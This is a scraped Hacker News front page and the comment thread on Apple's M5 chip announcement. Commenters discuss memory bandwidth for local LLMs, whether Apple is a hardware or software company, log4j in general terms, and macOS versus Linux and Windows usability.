frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Apple M5 chip

https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-the-next-big-leap-in-ai-performance-for...
733•mihau•6h ago•775 comments

Things I've learned in my 7 Years Implementing AI

https://www.jampa.dev/p/llms-and-the-lessons-we-still-havent
48•jampa•1h ago•16 comments

I almost got hacked by a 'job interview'

https://blog.daviddodda.com/how-i-almost-got-hacked-by-a-job-interview
444•DavidDodda•6h ago•220 comments

Claude Haiku 4.5

https://www.anthropic.com/news/claude-haiku-4-5
231•adocomplete•2h ago•87 comments

Pwning the Nix ecosystem

https://ptrpa.ws/nixpkgs-actions-abuse
188•SuperShibe•6h ago•27 comments

Claude Haiku 4.5 System Card [pdf]

https://assets.anthropic.com/m/99128ddd009bdcb/original/Claude-Haiku-4-5-System-Card.pdf
40•vinhnx•1h ago•3 comments

Clone-Wars: 100 open-source clones of popular sites

https://github.com/GorvGoyl/Clone-Wars
23•ulrischa•1h ago•0 comments

US Passport Power Falls to Historic Low

https://www.henleyglobal.com/newsroom/press-releases/henley-global-mobility-report-oct-2025
60•saubeidl•2h ago•61 comments

Show HN: Halloy – Modern IRC client

https://github.com/squidowl/halloy
202•culinary-robot•7h ago•64 comments

F5 says hackers stole undisclosed BIG-IP flaws, source code

https://www.bleepingcomputer.com/news/security/f5-says-hackers-stole-undisclosed-big-ip-flaws-sou...
70•WalterSobchak•6h ago•31 comments

C++26: range support for std:optional

https://www.sandordargo.com/blog/2025/10/08/cpp26-range-support-for-std-optional
47•birdculture•5d ago•25 comments

A kernel stack use-after-free: Exploiting Nvidia's GPU Linux drivers

https://blog.quarkslab.com/./nvidia_gpu_kernel_vmalloc_exploit.html
92•mustache_kimono•5h ago•6 comments

Recreating the Canon Cat document interface

https://lab.alexanderobenauer.com/updates/the-jasper-report
56•tonyg•5h ago•1 comments

Reverse engineering a 27MHz RC toy communication using RTL SDR

https://nitrojacob.wordpress.com/2025/09/03/reverse-engineering-a-27mhz-rc-toy-communication-usin...
53•austinallegro•5h ago•10 comments

Garbage collection for Rust: The finalizer frontier

https://soft-dev.org/pubs/html/hughes_tratt__garbage_collection_for_rust_the_finalizer_frontier/
82•ltratt•7h ago•74 comments

Leaving serverless led to performance improvement and a simplified architecture

https://www.unkey.com/blog/serverless-exit
211•vednig•8h ago•148 comments

M5 MacBook Pro

https://www.apple.com/macbook-pro/
233•tambourine_man•6h ago•285 comments

Breaking "provably correct" Leftpad

https://lukeplant.me.uk/blog/posts/breaking-provably-correct-leftpad/
56•birdculture•1w ago•15 comments

Show HN: Scriber Pro – Offline AI transcription for macOS

https://scriberpro.cc/hn/
106•rezivor•7h ago•98 comments

Americans' love of billiards paved the way for synthetic plastics

https://invention.si.edu/invention-stories/imitation-ivory-and-power-play
30•geox•6d ago•18 comments

Helpcare AI (YC F24) Is Hiring

1•hsial•7h ago

Bots are getting good at mimicking engagement

https://joindatacops.com/resources/how-73-of-your-e-commerce-visitors-could-be-fake
297•simul007•8h ago•223 comments

Recursive Language Models (RLMs)

https://alexzhang13.github.io/blog/2025/rlm/
6•talhof8•1h ago•0 comments

Pixnapping Attack

https://www.pixnapping.com/
263•kevcampb•13h ago•61 comments

iPad Pro with M5 chip

https://www.apple.com/newsroom/2025/10/apple-introduces-the-powerful-new-ipad-pro-with-the-m5-chip/
168•chasingbrains•6h ago•196 comments

FSF announces Librephone project

https://www.fsf.org/news/librephone-project
1322•g-b-r•19h ago•531 comments

Just talk to it – A way of agentic engineering

https://steipete.me/posts/just-talk-to-it
140•freediver•13h ago•79 comments

Show HN: Specific (YC F25) – Build backends with specifications instead of code

https://specific.dev/
9•fabianlindfors•2h ago•0 comments

David Byrne Radio

https://www.davidbyrne.com/radio#filter=all&sortby=date:desc
73•bookofjoe•4h ago•17 comments

Flapping-wing robot achieves self-takeoff by adopting reconfigurable mechanisms

https://www.science.org/doi/10.1126/sciadv.adx0465
69•PaulHoule•6d ago•18 comments
Open in hackernews

Apple M5 chip

https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-the-next-big-leap-in-ai-performance-for-apple-silicon/
731•mihau•6h ago

Comments

nik736•6h ago
This is only the base model, no upgrades yet for the Pro/Max version. The memory bandwidth is 153GB/s which is not enough to run viable open source LLM models properly.
quest88•6h ago
What do you mean by properly? What’s the behavior one would observe if they did run an llm?
nik736•6h ago
If you have enough memory to load a model, but not enough bandwidth to handle it, you will get a very low token/s output.
Rohansi•3h ago
You can also have enough bandwidth but be compute limited and get lower performance than expected. This is more likely to be the case for Apple Silicon vs. high power GPUs.
burnte•5h ago
"Properly" means at some arbitrary speed that the writer would describe as "fast" or "fast enough". If you have a lower demand for speed they'll run fine.
hu3•6h ago
Enough or not, they do describe it like this in an image caption:

"M5 is Apple’s next-generation system on a chip built for AI, resulting in a faster, more efficient, and more capable chip for the 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro."

mpeg•6h ago
The memory capacity to me is an even bigger problem, at 32GB max.
sgt•6h ago
That'll come in the MacBook Pro etc cycle, like last time, then you'll have 512GB RAM
mpeg•5h ago
Same with bandwidth though, usually pro/max memory has much higher speed
andy_ppp•5h ago
Yes the M4 Base has 120 GB/s, Pro 273 GB/s and Max has 546 GB/s... That means M5 Pro is potentially around 348 GB/s and M5 Max is almost at 700 GB/s - for comparison a 4090 has around 1,000 GB/s. So pretty incredible!
sgt•3h ago
Also I think even an M3 Ultra is more cost effective at running LLMs than 4090 or 5090. Mostly due to being more energy efficient. And less fragile than running a gamer PC build.
andy_ppp•2h ago
It can run larger models quite slowly but lacks matmul acceleration (included in the M5) that is very useful for context and prompt performance at inference time. I will probably burn my budget with an M5 Max with 256gb (maybe even 512gb) memory, the price will be upsetting but I guess that is life!
sgt•51m ago
Yes! I think smaller models on the M3 Ultra is interesting enough, but now with matmul/ tensors on M5 Ultra or Max, with decent unified mem, it will be a gamechanger.

I can easily imagine companies running Mac Studios in prod. Apple should release another Xserve.

bombcar•5h ago
Is the M4 Ultra even out yet? I can't see anything with 512 GB but the M3 Ultra on the Mac Studio (for a cool $4000 more).
asimovDev•4h ago
i am interested in seeing if they skip m4 and go straight to M5 and only make that available in the Pro. From my unscientific observations it seems that chips are running hotter and hotter, I wouldn't be surprised if M5 Ultra would struggle in a Studio and would require cooling performance of the Mac Pro case
iyn•4h ago
Yeah, that's my main bottleneck too. Constantly at 90%+ RAM utilization with my 64GiB (VMs, IDEs etc.). Hoping to go with at least 128GiB (or more) once M5 Max is released.
czbond•5h ago
I am interested to learn why models move so much data per second. Where could I learn more that is not a ChatGPT session?
shorts_theory•5h ago
You might be interested in LLM Systems which talks about how LLMs work at the hardware level and what optimizations can be done to improve the efficiency of them in this course: https://llmsystem.github.io/llmsystem2025spring/
modeless•5h ago
The models (weights and activations and caches) can fill all the memory you have and more, and to a first (very rough) approximation every byte needs to be accessed for each token generated. You can see how that would add up.

I highly recommend Andrej Karpathy's videos if you want to learn details.

pfortuny•5h ago
A very simplified version is: you need all the matrix to compute a matrix x vector operation, even if the vector is mostly zeroes. Edit: obviously my simplification is wrong but if you add up compression, etc… you get an idea.
rs186•3h ago
Would you mind specifying which video(s)? He has quite a lot of content to consume.
Sohcahtoa82•3h ago
Models are made of "parameters" which are really weights in a large neural network. For each token generated, each parameter needs to take its turn inside the CPU/GPU to be calculated.

So if you have a 7B parameter model with 16-bit quantization, that means you'll have 14 GB/s of data coming in. If you only have 153 GB/sec of memory bandwidth, that means you'll cap out ~11 tokens/sec, regardless of how my processing power you have.

You can of course quantize to 8-bit or even 4-bit, or use a smaller model, but doing so makes your model dumber. There's a trade-off between performance and capability.

adastra22•58m ago
I think you mean GB/token
Sohcahtoa82•35m ago
Err...yup. My bad. Can't edit it now.
wizee•5h ago
153 GB/s is not bad at all for a base model; the Nvidia DGX Spark has only 273 GB/s memory bandwidth despite being billed as a desktop "AI supercomputer".

Models like Qwen 3 30B-A3B and GPT-OSS 20B, both quite decent, should be able to run at 30+ tokens/sec at typical (4-bit) quantizations.

zamadatix•5h ago
Even at 1.8x the base memory bandwidth and 4x the memory capacity Nvidia spent a lot of time talking about how you can pair two DGXs together with the 200G NIC to be able to slowly run quantized versions of the models everyone was actually interested in.

Neither product actually qualifies for the task IMO, and that doesn't change just because two companies advertised them as such instead of just one. The absolute highest end Apple Silicon variants tend to be a bit more reasonable, but the price advantage goes out the window too.

cma•4h ago
M5 says 3X thunderbolt 5, should be able to do 240G bidirectional in total. Not that useful yet with max 32GB of RAM though.
diabllicseagull•5h ago
You don’t want to be bandwidth-bound, sure. But it all depends on how much compute power you have to begin with. 153GB/s is probably not enough bandwidth for an Rtx5090. But for the entry laptop/tablet chip M5? It’s likely plenty.
chedabob•5h ago
My guess would be those are going into the rumoured OLED models coming out next year.
Tepix•4h ago
With MoE LLMs like Qwen 3 30B-A3B that's no longer true.
heystefan•6h ago
Is it me or did they use to avoid calling it "AI"?
simonw•6h ago
Yeah, they rebranded it "Apple Intelligence" but this press release appears to be mostly using AI in the same (vague) way that the rest of the industry does.

Also just noticed this:

"And now with M5, the new 14-inch MacBook Pro and iPad Pro benefit from dramatically accelerated processing for AI-driven workflows, such as running diffusion models in apps like Draw Things, or running large language models locally using platforms like webAI."

First time I've ever heard of webAI - I wonder how they got themselves that mention?

rgo•4h ago
> First time I've ever heard of webAI - I wonder how they got themselves that mention?

I wondered the same. Went into Crunchbase and found out Crunchbase are now fully paywalled (!), well saw that coming... Anyway, hit the webAI blog, apparently they were showcased at the M4 Macbook Air event in 2024 [1] [2]:

> During a demonstration, a 15-inch Air ran a webAI’s 22 billion parameter Companion large language model, rendered a 4K image using the Blender app, opened several productivity apps, and ran the game Wuthering Waves without any kind of slowdown.

My guess is this was the best LLM use-case Apple could dig-up for their local-first AI strategy. And Apple Silicon is the best hardware use-case webAI could dig-up for their local-first AI strategy. As for Apple, other examples would look too hacky, purely dev-oriented and depend on LLM behemoths from US or China. Ie "try your brand-new performant M5 chip with LM Studio loaded with China's Deepseek or Meta's Llama" is an Apple exec no-go.

1. https://www.webai.com/blog/why-apples-m4-macbook-air-is-a-mi...

2. https://finance.yahoo.com/news/apple-updates-bestselling-mac...

airza•6h ago
I get they want to have a lot of their own swift-based bindings but I wish they could also keep their MPS pytorch bindings up to date...
toddmorey•6h ago
The modern Apple feels like their hardware teams way outperforming the software teams.
alexanderson•6h ago
Apple has always been a hardware company first - think of how they sell consumers computers with the OS for free, while Microsoft primarily just sells the OS (when comparing the consumer business; I don’t want to get into all the other stuff Microsoft does).

Now that they own the SoC design pipeline, they’re really able to flex these muscles.

Hamuko•6h ago
Not really. Back in the day you wouldn't buy a MacBook because it was powerful. Most likely it had a very shitty Intel CPU with not a lot of cores and with thermal challenges, and the reason you bought it was because macOS.
alt227•6h ago
> very shitty Intel CPU with not a lot of cores and with thermal challenges

Very often the intel chips in macbooks were stellar, they were just seriously inhibited by Apples terrible cooling designs and so were permanently throttled.

They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

scrlk•5h ago
They made things even worse with fan curves tuned for silence until the CPU was practically at TjMax.
kllrnohj•4h ago
> They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

Curiously they managed to figure this out exactly when it became their silicon instead (M1 MacBook Pros were notably thicker and with more cooling capacity than the outgoing Intel ones)

alt227•4h ago
I still believe they purposefully throttled the last gen of intel Macs just to make people have bad memories of them.
bzzzt•4h ago
I presume they were just playing it safe to not let the M1 migration flop. If you're dragging your users through a big migration the last thing you need is complaints about the new hardware...
chasil•5h ago
And in many decades past, OpenStep was slowly moving its GUI from Next hardware to software sales on various UNIX platforms and Windows NT.

And this would eventually evolve into MacOS.

https://en.wikipedia.org/wiki/OpenStep

qwertytyyuu•5h ago
not just mac os, also the decent keyboard and actually good display, guarenteed.
fnord123•5h ago
The intel laptops also grounded into the user. I still can't believe they didn't have a recall to sort that out.
hamdingers•2h ago
Nope, many bought it in spite of macOS because it was a durable laptop with an excellent screen, good keyboard, and (afaik still) the only trackpad that didn't suck.
leptons•1h ago
>the reason you bought it was because macOS.

That is probably the least of reasons why people buy Apple - to many it's just a status symbol, and the OS is a secondary consideration.

alt227•6h ago
Apple has always been a software first company, and they only sell the hardware as a vehicle to their software. They regularly say this themselves and have always called themselves a software company. Compare their hardware revenues with that of the app store and icloud subscriptions, you will see where they make most of their money.

EDIT: I seem to be getting downvoted, so I will just leave this here for people to see I am not lying:

https://www.businessinsider.com/tim-cook-apple-is-not-a-hard...

RossBencina•6h ago
Apple has been calling themselves a consumer electronics company since at least 2006.
alt227•2h ago
"Apple views itself as a software company" - Steve Jobs (2007)

https://www.youtube.com/watch?v=dEeyaAUCyZs

jsnell•5h ago
Sure, let's compare.

Apple's product revenue in this fiscal year has been $233B, with a gross margin of $86B.

Their services revenue is $80B with $60B gross margin.

justincormack•5h ago
Much of the service revenue is the payment from Google for search placement.
alt227•4h ago
Source?
jsnell•1h ago
Good grief. Apple's official financials.

https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...

Look, I totally understand making an off-hand comment like you did based on a gut feeling. Nobody can fact-check everything they write, and everyone is wrong sometimes. But it is pretty lazy to demand a source when you were just making things up. When challenged with specific and verifiable nubmers, you should have checked the single obvious source for the financials of any public company. Their quarterly statements.

bombcar•5h ago
Tim Apple is notoriously misinformed about his own company.
alt227•2h ago
I guess Steve Jobs was as well then.

https://www.youtube.com/watch?v=dEeyaAUCyZs

ksec•5h ago
It goes back even further, Steve Jobs said Apple is a software company, you just have to buy its hardware to use it. It is the whole experience.
alt227•2h ago
Here is the quote for anyone who is interested:

https://www.youtube.com/watch?v=dEeyaAUCyZs

wat10000•5h ago
I did that comparison and they make the vast majority of their money on hardware. Half of their revenue is iPhone, a quarter is services, and the remaining quarter is divided up among the other hardware products.

Regardless of revenue, Apple isn't a hardware company or a software company. It's a product company. The hardware doesn't exist merely to run the software, nor does the software exist merely to give functionality to the hardware. Both exist to create the product. Neither side is the "main" one, they're both parts of what ultimately ships.

alt227•4h ago
Do the same calculation for profit instead of revenue.
wat10000•10m ago
Are those numbers available? In any case, comment said revenue, not profit.
alt227•2h ago
> The hardware doesn't exist merely to run the software

Watch this and maybe you might change your mind:

https://www.youtube.com/watch?v=dEeyaAUCyZs

wat10000•3m ago
I think he's saying software is essential, not that it's the only thing. He contrasts the iPod with products from Japanese companies, which tend to make great hardware with crap software, and that software difference is why the iPod beat them.

Modern Apple is also quite a bit more integrated. A company designing their own highly competitive CPUs is more hardware-oriented than one that gets their CPUs off the shelf from Intel.

achierius•5h ago
> Compare their hardware revenues with that of the app store and icloud subscriptions, you will see where they make most of their money.

Yes, it's $70B a year from iPhones alone and $23B from the totality of the Services org. (including all app store / subscription proceeds). Significantly more than 50% of the company's total profits come from hardware sales.

the_arun•5h ago
Shouldn’t we compare profit? Instead of revenues?
transcriptase•5h ago
McDonald’s is still a burger joint, even if the soda and fries are far higher margin.
spogbiper•5h ago
mcds is more of a real estate company - https://www.wallstreetsurvivor.com/mcdonalds-beyond-the-burg...
ertgbnm•5h ago
In addition, making money off the software that others develop and sell on the app store doesn't make Apple more of a software company, it makes them a middle man.
alt227•4h ago
IMO a middle man means you are in between 2 other services, taking a cut off the top. In this instance, apple not only created and curate the app store, but also invented the concept. In this case they are definitely not a middle man, they are a software company selling access to their software to developers.
alt227•4h ago
Where are you getting these numbers from, care to share source?

We should be comparing profit on those departments not revenue. Do you have those figures?

It is well known that companies often sell the physicval devices at a loss, in order to make the real money from the services on top.

adastra22•4h ago
Apple does not sell hardware at a loss.
alt227•3h ago
Yeah, everyone says stuff like this but nobody can actually produce any reliable sources to show how much profit it actually makes. So until you can, its all guess work.
adastra22•2h ago
Apple is a public company. You can find the numbers (broken down into product aka hardware vs service) here: https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...
alt227•2h ago
Feel free to do the maths and prove me wrong then.
HumblyTossed•5h ago
Tim is the CEO, he's going to say whatever he needs to in the moment to drive investment.

Apple is and always has been a HW company first.

alt227•4h ago
OK So I guess when the CEO of a company explicitly says something about their company, we should just ignore it because he is 'in the moment'?
dylan604•4h ago
Apple has always? Sure, maybe today with collection % of sales from apps it looks like a software company. If there was no iDevcies, there'd be no need for app store. Your link is all about Cook, yet he was not always the CEO. Woz didn't care what software you ran, he just wanted the computer to be usable so you could run whatever software. Jobs wanted to restrict things, but it was still about running the hardware. Whatever Cook thinks Apple is now does not make it always been as you claim
alt227•2h ago
You know you might just have a point if you werent completely making that all up.

Steve Jobs consistently made the point that Apples hardware is the same as everyone elses, what makes them different is they make the best software which enables the best user experience.

Here see this quote from Steve Jobs which shows that his attitude is the complete opposite of what you wrote.

https://www.youtube.com/watch?v=dEeyaAUCyZs

ViktorRay•4h ago
Steve Jobs himself said that Apple sees itself as a software company

https://youtu.be/dEeyaAUCyZs

The above link is a video where he mentions that.

It is true that Apple’s major software products like iOS and MacOS are only available on Apple’s own hardware. But the Steve Jobs justification for this (which he said in a different interview I can’t find right now so I will paraphrase) is that he felt Apple made the best hardware and software in the world so he wanted Apple’s customers to experience the best software on the best hardware possible which he felt only Apple could provide. (I wish I could find the exact quote.)

Anyway according to Steve Jobs Apple is a software first company.

fidotron•6h ago
What I would do for Snow Leopard on the M class hardware.
RossBencina•6h ago
You could run it in an emulator.
asimovDev•5h ago
do you mean literally 10.6 on AS or do you mean something as good as it was
fidotron•4h ago
Something that good.

It was coherent, (relatively) bug free, and lacked the idiot level iOSification and nagging that is creeping in all over MacOS today.

I haven't had to restart Finder until recently, but now even that has trouble with things like network drives.

I'm positive there are many internals today that are far better than in Snow Leopard, but it's outweighed by user visible problems.

It shouldn't surprise you I think that Android Jelly Bean was the best phone OS ever made as well, and they went completely in the wrong direction after that.

astrange•3h ago
It was very easy to lose data in Snow Leopard because they hadn't introduced the document autosave system yet. That was the next version.
fidotron•2h ago
You mean it only did things you told it to do? That's a feature.

Programs absolutely could have much more controllable auto save before for when it made sense.

astrange•51m ago
"I lose work when the power goes out" is not a feature. Neither is "I can't apply security updates because I can't restart".

Speaking of security it didn't have app sandboxing either.

fidotron•27m ago
You mean programs could access the file system normally? They were absolutely isolated as standard unix processes.

This is what I mean about iOSification - it's trending towards being a non serious OS. Linux gets more attractive by the day, and it really is the absence of proper support of hardware in the class of the M series that prevents a critical mass of devs jumping ship.

geodel•6h ago
Well besides software that runs in data centers/ cloud most other software is turning to crap. And people who think this crap is fine have now reached to position of responsibility at lot of companies. So things would go only worse from here.
sho_hn•5h ago
Except community-developed open source software, which (slowly, perhaps) keeps getting better and has high resistance to enshittification.
Noaidi•5h ago
This right here is moving me back to GrapheneOS and Linux. I was lucky enough to be able to uninstall Liquid glAss before the embargo. I will miss the power efficiency of my M1, but the trade off keep looking better and better.

being poor, I need to sell my Macbook to get money to pay of my 16e, then sell the 16e and use that money to but a Pixel 9, then probably a but a Thinkpad Carbon X1. Just saying all that to show you the lengths I am going through to boycott/battle the enshitification.

pbronez•5h ago
If you already have an M1 MacBook, why no run Asahi Linux?
Noaidi•4h ago
Is it functional yet? Last I looked at it was about a year ago. Do you have any real use experience of it?
Aperocky•5h ago
Remember log4j? I don't share your enthusiasm.

At least its open source and free I guess.

HumblyTossed•5h ago
Wow.
usefulcat•5h ago
That was a bug, not at all the same thing as enshittification.
Aperocky•5h ago
It was enshittification. A logging framework that looks up LDAP servers? Why?

Adding extra features that aren't necessarily needed is enshittification, and very not-unix.

bzzzt•4h ago
It's not really added functionality, more unintended consequences of too much flexibility. Java contains JNDI (Java naming & directory interface), a very unified 'directory' system for all kinds of configuration of which LDAP is just one of the backend implementation options. The key issue is you can call into other objects which is unwise to do when used with untrusted user input.
jacquesm•5h ago
What is your point even? That open source has bugs? The closed source does not have such bugs?
geodel•5h ago
Indeed a software used by thousands of commercial products and millions of enterprise applications with ZERO dollar support from either must be maintained at perfect, bug free level by lazy volunteers. Because internet demands it.
bzzzt•4h ago
Would it even be possible to create today's software ecosystems by mandating all libraries are maintained and supported to the strictest standards?

That would be the end of open source, hobbyists and startup companies because you'd have to pay up just to have a basic C library (or hope some companies would have reasonable licensing and support fees).

Remember one of the first GNU projects was GCC because a compiler was an expensive, optional piece of software on the UNIX systems in those days.

jacquesm•3h ago
That would be the end of the software industry. No company outside of aerospace and medical devices is capable of delivering this and I even have my doubts about those two, though at least they are trying.
Aperocky•5h ago
You won't have that bug if the logger isn't trying to talk to some ldap server.

It's not even about open source or closed source at this point. It's about feature creep.

bzzzt•4h ago
It's not talking to an LDAP server, it's the functionality for talking to an LDAP server that is causing the issue. Even if you don't need LDAP you're still vulnerable when a client can inject information in a log message.
Aperocky•2m ago
Why is this functionality needed in the first place? I want to write log, some kind of string, into some kind of files, with rotation, maybe even send it somewhere that expect logs.

Why parse whatever is in the logs, at all?

Imagine the same stuff in your SSH client, it would parse the content before sending them over because a functionality requires it to talk to some server somewhere, it's insanity.

geodel•5h ago
The OSS that keeps getting "better" is one that accept lot user feature requests and/or implementation. Else maintainers are hostile to users. And when they do accept most of those requests and code we all know how it goes.
TheAtomic•6h ago
Yup. And the marketing department is ahead of both of them.
z3ratul163071•6h ago
i was about to write exactly that.
linguae•5h ago
This is not the first time this has happened in Apple’s history. The transition from the 68k architecture to the PowerPC brought major performance improvements, but Apple’s software didn’t take full advantage of it. If I remember correctly, even after the PowerPC switch, core elements of the classic Mac OS still ran in emulation as late as Mac OS 9. Additionally, the classic Mac OS lacked protected memory and preemptive multitasking, leading to relatively frequent crashes. Taligent and Copland were attempts to address these issues, but they both faced development hell, culminating with the purchase of NeXT and the development of Mac OS X. But by the time Mac OS X was released, PowerPC was becoming less competitive than the x86, culminating with the Intel switch in 2006. At this point it was Apple’s software that distinguished Macs from the competition, which remained the case until the M1 Macs were released five years ago.
mikepurvis•5h ago
Sixteen years ago, John Gruber wrote:

> Hardware and software both matter, and Apple’s history shows that there’s a good argument to be made for developing integrated hardware and software. But if you asked me which matters more, I wouldn’t hesitate to say software. All things considered I’d much prefer a PC running Mac OS X to a Mac running Windows.

https://daringfireball.net/2009/11/the_os_opportunity

At the time I'd only been a Mac user for a few years and I would have strongly agreed. But definitely things have shifted— I've been back on Windows/WSL for a number of years, and it's software quality/compatibility issues that are a lot of what keeps me from trying another Mac. Certainly I'm far more tempted by the hardware experience than I am the software, and it's not even really close.

KeplerBoy•5h ago
I bet most people around here would prefer fully supported linux over mac os on their apple silicon.
Romario77•5h ago
Linux UI is crap compared to Mac.

It's a server or developer box first and a non-technical user second.

timschmidt•5h ago
I've felt the opposite for more than a decade. On Linux, it's relatively easy for me to choose a set of applications which all use the same UI toolkit. Additionally, the web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function. Linux was the first OS with an "app store" (the package manager). CLI utilities available tend to be the full fat versions with all the useful options, rather than minimalist versions there to satisfy posix compatibility. I could go on.

On Linux there is variety and choice, which some folks dislike.

But on the Mac I get whatever Apple gives me, and that is often subject to the limitations of corporate attention spans and development budgets.

MichealCodes•5h ago
> limitations of corporate attention spans and development budgets

And arbitrary turf wars like their war against web apis/apps causing more friction for devs and end users.

ahartmetz•1h ago
I'm a Linux fan and I like that Apple isn't rubber-stamping the two new web APIs a week that Google comes up with. There are hundreds of them, most of them quite small fortunately.
robenkleene•1h ago
> The web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function.

Should Emacs and Vim both be called "Editor" then?

To me, this is actually a great example of the problems with Linux as a community, that GUI applications seem to just be treated as placeholders (e.g., all word processors are the same?), but then its inconsistent by celebrating the unique differences between editors like Vim and Emacs. Photoshop, Excel, Logic Pro, Final Cut Pro are, in my opinion, crown jewels of what we've accomplished in computing, and by extension some of the greatest creations of the human race, democratizing tasks that in some cases would have cost millions of dollars before (e.g., a recording studio in your home). Relegating these to generic names like "spreadsheet", makes them sound interchangeable, when in my opinion they're each individual creations of great beauty that should wear their names with pride. They've helped improve the trajectory of the human race by facilitating many individuals to perform actions they never would have had the resources to do otherwise.

gedy•5h ago
That was maybe the case 10+ years ago but honestly have been using Fedora with Gnome on my M1, it's pretty polished and nice now.
pxc•5h ago
Fully supported Linux + proper suspend-to-RAM are the two things I want out of Apple Silicon and may never quite get. Better online low power states are fine, but I want suspend-to-RAM and suspend-then-hibernate.

If I close my laptop for a few days, I don't want significant battery drain. If I don't use it for two weeks, I want it to still have life left. And I don't want to write tens of gigabytes to disk every time I close the lid, either!

zozbot234•5h ago
What happens if you enable airplane mode before closing the laptop? That should power down all radios so battery drain should be approximately equivalent to S3 standby.
ValdikSS•4h ago
Sleep states are not trivial from the security perspective, and they've eliminated the issue by just not allowing it :)
astrange•1h ago
It does hibernate. It just takes a long time to do it because the experience of waking up from it is bad.
vuggamie•5h ago
The best part of MacOS for me is the unix tools. The command line is a real unix command line. And the rest just works. If I need a linux environment I ssh into a VPS.
epistasis•5h ago
Or even just containers on the Mac. Unless you need a GPU with specific hardware, or to connect to a cluster, there's ever decreasing need to use remote boxes.
Daneel_•5h ago
Well, kind of.. the commands on Mac OS all just a little bit different and a little bit janky. I still had to relearn all the common commands I use in order to function. I survived 6 months before I went back to a Windows/WSL combo.
epistasis•4h ago
If you want the GNU versions of tools rather than the Mac POSIX versions, then brew can help replace your bin directory with all the GNU niceties.

If you're talking about hardware interaction from the command line, that's very different and I don't think there's a fix.

MobiusHorizons•4h ago
Notice the op said Unix not Linux. Gnu made a lot of incompatible changes from the Unix tools it was cloning. Many people in the Linux community prefer the GNU quirks (they are definitely more performance optimized for example). But if you are talking about Unix, the FreeBSD derived userland on a Mac has real Unix lineage.
ghaff•4h ago
It doesn't matter for everyone/most. But, yes, having a Unix command line within MacOS is a pretty big win for some of us. Not something I use on a daily basis certainly. And I'd probably set up a Linux box (or ssh into one) if I really needed that routinely. But it's a nice bonus.
BeetleB•4h ago
> If I need a linux environment I ssh into a VPS.

I want good window management. Linux gives me a huge number of options. MacOS - not as much.

geodel•5h ago
"Fully supported by whom" is the issue and important one. Apple won't do it and going by support from "most people around here" Hector Martin et al got crumbs for years, nowhere near to support the development.

One can just hand wave "Apple must support Linux and all" but that is not going to get anything done.

7e•4h ago
Linux is a vanity and the illusion is only skin-deep. The overall UX truly sucks.
KeplerBoy•3h ago
Which illusion? It's a computer, no more, no less and Linux is a perfectly fine interface to that computer.
rowanG077•2h ago
I don't understand. From a pure visual standpoint OSX beats. Linux is not particularly known for looking good or cohesive. But in basically all matters it beats the pants of OSX.
artisin•2h ago
The UX only sucks if you're unwilling to put in a minimal amount of time and effort. After that, it has no equal; it is, by definition, the opposite of vanity.
selectodude•5h ago
That’s so wild to me - my personal laptop is still a Mac but I’m in windows all day for work. Some of the new direction of macOS isn’t awesome but the basics are still rock solid. Touchpad is perfect, sleep works 100% of the time for days on end, still has UNIX underneath.
MichealCodes•5h ago
The basics are not rock solid. Even a core feature such as remote management crashes and freezes every 5 minutes when you connect from a non-apple machine, many have reported this over years but Apple just does Apple. Safari is still atrocious when it comes to web api supports. The worst part is, with Apple, we do not know if these are intentional anti-competitive barriers or actual software bugs. I purchased a mac mini simply to compile apps via xcode and can say the core experience is MUCH more buggy than a fresh Windows or Ubuntu install.

Edit: Hard to call intentionally preventing support for web apis a power user thing. This creates more friction for basic users trying to use any web app.

Edit2: lol Apple PR must be all over this, went from +5 to -1 in a single refresh. Flagged for even criticizing what they intentionally break.

butlike•5h ago
They said the basics are rock solid (to which I agree). What you're describing, I'd consider a "power user."
foldr•5h ago
Are those basics? You don’t have to use Safari, and I’ve never used remote management over the 20 years or so that I’ve been a Mac user.
MichealCodes•5h ago
If we dismiss remote management as a non-core feature shouldn't we consider installing a new browser to be advanced usage as well?

I understand that this post is about MacOS, but yes, we are forced to support Safari for iOS. Many of these corporate decisions to prevent web apps from functioning properly spill over from MacOS Safari to iOS Safari.

selectodude•5h ago
Safari adds hours of battery life due to its hyper focus on power consumption. The level to which web API standards are affected is rather immaterial to me. I imagine we’re different consumers though.
MichealCodes•5h ago
Adds hours of battery life to the expense of making your microphone input completely inaudible due to throttling if you background the tab it's running on.

On iOS you cannot even keep a web app running in the background. The second they mutlitask, even with an audio/microphone active, Apple kills it. Are they truly adding battery life or are they cheating by creating restrictions that prevent apps from working?

Being able to conduct a voice call through the browser seems like a pretty basic use case to me.

ahmeneeroe-v2•4h ago
I am in the same boat. I prefer battery life
MichealCodes•3h ago
Breaking things is not extending battery life. Battery life assumes functionality. Breaking functionality to extend it is a scapegoat and the break-whatever-you-want could be provided as a mode instead of one-size fits all, we don't care what breaks approach.
socalgal2•3h ago
If you’re comparing to Chrome, tests show it’s no longer true
astrange•3h ago
Why would you want to support web APIs? They're all just Google proposing 5000 new ways for advertisers to fingerprint you but doing it through "standards".
MichealCodes•3h ago
Nice strawman. The core of webapis is about opening up lower level functionality from the sandbox/accessibility of the web. Beyond audio and video IO, there's great stuff coming with webgpu and webNN. Web apps are much safer and much more convenient than downloading an app, well in theory they could be if support wasn't regularly sabotaged to protect a corporate interest in walled gardens.
pico303•5h ago
Same boat, and 100% agree. I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better. Windows only saving grace, as a developer, is WSL.

For a simple example, no app remembers the last directory you were working in. The keys each app uses are completely inconsistent from app to app. And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor. Then there’s the Windows 95-style dialog boxes mixed in with the Windows 11-style dialog boxes; what a UI mess. I spoke with one vendor the other day who was actually proud they’d adopted a ribbon interface in their UI “just like Office” and I verbally laughed.

